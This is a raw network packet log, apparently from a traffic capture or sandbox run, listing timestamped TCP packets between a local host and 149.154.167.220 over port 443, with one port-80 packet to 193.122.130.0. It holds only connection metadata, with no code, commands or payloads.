Sep 27, 2024 12:52:40.425559044 CEST	49729	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:40.425590038 CEST	443	49729	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:41.174665928 CEST	443	49729	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:41.176476955 CEST	49729	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:41.176496029 CEST	443	49729	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:41.176561117 CEST	49729	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:41.176569939 CEST	443	49729	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:41.529309988 CEST	443	49729	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:41.529381037 CEST	443	49729	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:41.529443026 CEST	49729	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:41.529894114 CEST	49729	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:41.532522917 CEST	49730	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:41.532576084 CEST	443	49730	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:41.532649994 CEST	49730	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:41.532871962 CEST	49730	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:41.532901049 CEST	443	49730	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:42.163304090 CEST	443	49730	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:42.164988995 CEST	49730	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:42.165007114 CEST	443	49730	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:42.165066957 CEST	49730	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:42.165076017 CEST	443	49730	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:42.672213078 CEST	443	49730	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:42.672311068 CEST	443	49730	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:42.672389984 CEST	49730	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:42.672939062 CEST	49730	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:42.675940990 CEST	49731	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:42.675976992 CEST	443	49731	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:42.676057100 CEST	49731	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:42.676317930 CEST	49731	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:42.676327944 CEST	443	49731	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:43.284672976 CEST	443	49731	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:43.286799908 CEST	49731	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:43.286820889 CEST	443	49731	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:43.286916018 CEST	49731	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:43.286921024 CEST	443	49731	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:44.705384970 CEST	443	49731	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:44.705836058 CEST	443	49731	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:44.705921888 CEST	49731	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:44.707128048 CEST	49731	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:44.712542057 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:44.712594032 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:44.712673903 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:44.712977886 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:44.712992907 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:45.318279982 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:45.361372948 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:45.373334885 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:45.373348951 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:45.384241104 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:45.384252071 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:45.606251955 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:45.606339931 CEST	443	49732	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:45.606446981 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:45.613493919 CEST	49732	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:45.616765022 CEST	49733	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:45.616805077 CEST	443	49733	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:45.616869926 CEST	49733	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:45.617120981 CEST	49733	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:45.617136002 CEST	443	49733	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:46.221977949 CEST	443	49733	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:46.223997116 CEST	49733	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:46.224023104 CEST	443	49733	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:46.224111080 CEST	49733	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:46.224117994 CEST	443	49733	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:46.527688026 CEST	443	49733	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:46.527770042 CEST	443	49733	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:46.527842999 CEST	49733	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:46.528433084 CEST	49733	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:46.531269073 CEST	49734	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:46.531299114 CEST	443	49734	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:46.531464100 CEST	49734	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:46.531707048 CEST	49734	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:46.531716108 CEST	443	49734	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:47.147603035 CEST	443	49734	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:47.149977922 CEST	49734	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:47.150002956 CEST	443	49734	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:47.150278091 CEST	49734	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:47.150283098 CEST	443	49734	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:47.515693903 CEST	443	49734	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:47.515762091 CEST	443	49734	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:47.515831947 CEST	49734	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:47.516330957 CEST	49734	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:47.518897057 CEST	49735	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:47.518999100 CEST	443	49735	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:47.519090891 CEST	49735	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:47.519311905 CEST	49735	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:47.519345045 CEST	443	49735	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:48.167285919 CEST	443	49735	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:48.168992996 CEST	49735	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:48.169020891 CEST	443	49735	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:48.169090986 CEST	49735	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:48.169102907 CEST	443	49735	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:48.484584093 CEST	443	49735	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:48.484658957 CEST	443	49735	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:48.484708071 CEST	49735	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:48.485102892 CEST	49735	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:48.487636089 CEST	49736	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:48.487677097 CEST	443	49736	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:48.487814903 CEST	49736	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:48.488032103 CEST	49736	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:48.488044977 CEST	443	49736	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:49.115973949 CEST	443	49736	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:49.119400024 CEST	49736	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:49.119411945 CEST	443	49736	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:49.119601011 CEST	49736	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:49.119606018 CEST	443	49736	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:49.398499966 CEST	443	49736	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:49.398572922 CEST	443	49736	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:49.398694038 CEST	49736	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:49.399132967 CEST	49736	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:49.401557922 CEST	49737	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:49.401668072 CEST	443	49737	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:49.401768923 CEST	49737	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:49.402036905 CEST	49737	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:49.402067900 CEST	443	49737	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:50.098779917 CEST	443	49737	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:50.100466967 CEST	49737	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:50.100511074 CEST	443	49737	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:50.100567102 CEST	49737	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:50.100588083 CEST	443	49737	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:51.106308937 CEST	443	49737	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:51.107842922 CEST	443	49737	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:51.107950926 CEST	49737	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:51.109575033 CEST	49737	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:51.113392115 CEST	49738	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:51.113445044 CEST	443	49738	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:51.113532066 CEST	49738	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:51.113859892 CEST	49738	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:51.113878012 CEST	443	49738	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:51.718878984 CEST	443	49738	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:51.721621990 CEST	49738	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:51.721651077 CEST	443	49738	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:51.721714973 CEST	49738	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:51.721721888 CEST	443	49738	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:52.142447948 CEST	443	49738	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:52.144404888 CEST	443	49738	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:52.144505024 CEST	49738	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:52.146267891 CEST	49738	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:52.149754047 CEST	49739	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:52.149801970 CEST	443	49739	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:52.149882078 CEST	49739	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:52.150175095 CEST	49739	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:52.150188923 CEST	443	49739	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:52.764332056 CEST	443	49739	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:52.766767025 CEST	49739	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:52.766784906 CEST	443	49739	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:52.766921997 CEST	49739	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:52.766927958 CEST	443	49739	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.062619925 CEST	443	49739	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.062697887 CEST	443	49739	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.062896967 CEST	49739	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.063824892 CEST	49739	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.066726923 CEST	49740	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.066772938 CEST	443	49740	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.066869974 CEST	49740	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.067142963 CEST	49740	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.067163944 CEST	443	49740	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.675199032 CEST	443	49740	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.677407980 CEST	49740	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.677433968 CEST	443	49740	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.677557945 CEST	49740	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.677562952 CEST	443	49740	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.984016895 CEST	443	49740	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.984097958 CEST	443	49740	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.984196901 CEST	49740	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.984750986 CEST	49740	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.987601042 CEST	49741	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.987649918 CEST	443	49741	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:53.987734079 CEST	49741	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.987987041 CEST	49741	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:53.987998009 CEST	443	49741	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:54.619467974 CEST	443	49741	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:54.621805906 CEST	49741	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:54.621840000 CEST	443	49741	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:54.621913910 CEST	49741	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:54.621920109 CEST	443	49741	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:54.920953035 CEST	443	49741	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:54.921015978 CEST	443	49741	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:54.921189070 CEST	49741	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:54.921741962 CEST	49741	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:54.924725056 CEST	49742	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:54.924762011 CEST	443	49742	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:54.924829960 CEST	49742	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:54.925215960 CEST	49742	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:54.925230026 CEST	443	49742	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:55.532428980 CEST	443	49742	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:55.534487009 CEST	49742	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:55.534507036 CEST	443	49742	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:55.534571886 CEST	49742	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:55.534579992 CEST	443	49742	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:55.913522959 CEST	443	49742	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:55.913605928 CEST	443	49742	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:55.913676023 CEST	49742	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:55.923208952 CEST	49742	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:55.928944111 CEST	49743	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:55.928983927 CEST	443	49743	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:55.929059982 CEST	49743	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:55.929457903 CEST	49743	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:55.929471016 CEST	443	49743	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:56.557512999 CEST	443	49743	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:56.559361935 CEST	49743	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:56.559392929 CEST	443	49743	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:56.559437990 CEST	49743	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:56.559444904 CEST	443	49743	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:56.825756073 CEST	443	49743	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:56.825870991 CEST	443	49743	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:56.825952053 CEST	49743	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:56.826438904 CEST	49743	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:56.829314947 CEST	49744	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:56.829348087 CEST	443	49744	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:56.829430103 CEST	49744	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:56.829787970 CEST	49744	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:56.829801083 CEST	443	49744	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:57.437762022 CEST	443	49744	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:57.439574957 CEST	49744	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:57.439603090 CEST	443	49744	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:57.439692020 CEST	49744	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:57.439697981 CEST	443	49744	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:57.707058907 CEST	443	49744	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:57.707140923 CEST	443	49744	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:57.707194090 CEST	49744	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:57.707920074 CEST	49744	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:57.711864948 CEST	49745	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:57.711915970 CEST	443	49745	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:57.711999893 CEST	49745	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:57.712275028 CEST	49745	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:57.712289095 CEST	443	49745	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:58.341799974 CEST	443	49745	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:58.344360113 CEST	49745	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:58.344381094 CEST	443	49745	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:58.344568968 CEST	49745	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:58.344574928 CEST	443	49745	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:58.614962101 CEST	443	49745	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:58.615041018 CEST	443	49745	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:58.615171909 CEST	49745	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:58.615978956 CEST	49745	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:58.619652987 CEST	49746	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:58.619683027 CEST	443	49746	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:58.619812012 CEST	49746	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:58.620170116 CEST	49746	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:58.620182037 CEST	443	49746	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:59.245456934 CEST	443	49746	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:59.250447989 CEST	49746	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:59.250467062 CEST	443	49746	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:59.250535965 CEST	49746	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:59.250540018 CEST	443	49746	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:59.536154032 CEST	443	49746	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:59.536237955 CEST	443	49746	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:59.538254023 CEST	49746	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:59.538642883 CEST	49746	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:59.541732073 CEST	49747	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:59.541790962 CEST	443	49747	149.154.167.220	192.168.2.7
Sep 27, 2024 12:52:59.541878939 CEST	49747	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:59.542160988 CEST	49747	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:52:59.542181015 CEST	443	49747	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:00.367322922 CEST	443	49747	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:00.369679928 CEST	49747	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:00.369704962 CEST	443	49747	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:00.369780064 CEST	49747	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:00.369787931 CEST	443	49747	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:00.657366991 CEST	443	49747	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:00.657454967 CEST	443	49747	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:00.657516003 CEST	49747	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:00.658179045 CEST	49747	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:00.671757936 CEST	49708	80	192.168.2.7	193.122.130.0
Sep 27, 2024 12:53:00.678836107 CEST	49748	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:00.678951025 CEST	443	49748	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:00.679048061 CEST	49748	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:00.679424047 CEST	49748	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:00.679465055 CEST	443	49748	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:01.301094055 CEST	443	49748	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:01.303190947 CEST	49748	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:01.303256035 CEST	443	49748	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:01.303344965 CEST	49748	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:01.303364038 CEST	443	49748	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:02.582853079 CEST	443	49748	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:02.582963943 CEST	443	49748	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:02.583070993 CEST	49748	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:02.583718061 CEST	49748	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:02.586678028 CEST	49750	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:02.586713076 CEST	443	49750	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:02.586822987 CEST	49750	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:02.587090015 CEST	49750	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:02.587100983 CEST	443	49750	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:03.216855049 CEST	443	49750	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:03.219048023 CEST	49750	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:03.219064951 CEST	443	49750	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:03.219146013 CEST	49750	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:03.219156981 CEST	443	49750	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:03.633328915 CEST	443	49750	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:03.633426905 CEST	443	49750	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:03.633512020 CEST	49750	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:03.634196997 CEST	49750	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:03.636821032 CEST	49751	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:03.636918068 CEST	443	49751	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:03.637096882 CEST	49751	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:03.637588978 CEST	49751	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:03.637624979 CEST	443	49751	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:05.288770914 CEST	443	49751	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:05.290831089 CEST	49751	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:05.290855885 CEST	443	49751	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:05.290992975 CEST	49751	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:05.290998936 CEST	443	49751	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:05.655827045 CEST	443	49751	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:05.655910969 CEST	443	49751	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:05.656055927 CEST	49751	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:05.656727076 CEST	49751	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:05.659195900 CEST	49752	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:05.659221888 CEST	443	49752	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:05.659308910 CEST	49752	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:05.659599066 CEST	49752	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:05.659610033 CEST	443	49752	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:06.346971989 CEST	443	49752	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:06.349303961 CEST	49752	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:06.349324942 CEST	443	49752	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:06.349370956 CEST	49752	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:06.349380016 CEST	443	49752	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:06.735833883 CEST	443	49752	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:06.736046076 CEST	443	49752	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:06.736167908 CEST	49752	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:06.736522913 CEST	49752	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:06.738816023 CEST	49753	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:06.738859892 CEST	443	49753	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:06.738996029 CEST	49753	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:06.739193916 CEST	49753	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:06.739211082 CEST	443	49753	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:07.371243000 CEST	443	49753	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:07.373070955 CEST	49753	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:07.373094082 CEST	443	49753	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:07.373169899 CEST	49753	443	192.168.2.7	149.154.167.220
Sep 27, 2024 12:53:07.373179913 CEST	443	49753	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:08.007999897 CEST	443	49753	149.154.167.220	192.168.2.7
Sep 27, 2024 12:53:08.008223057 CEST	443	49753	149.154.167.220	192.168.2.7
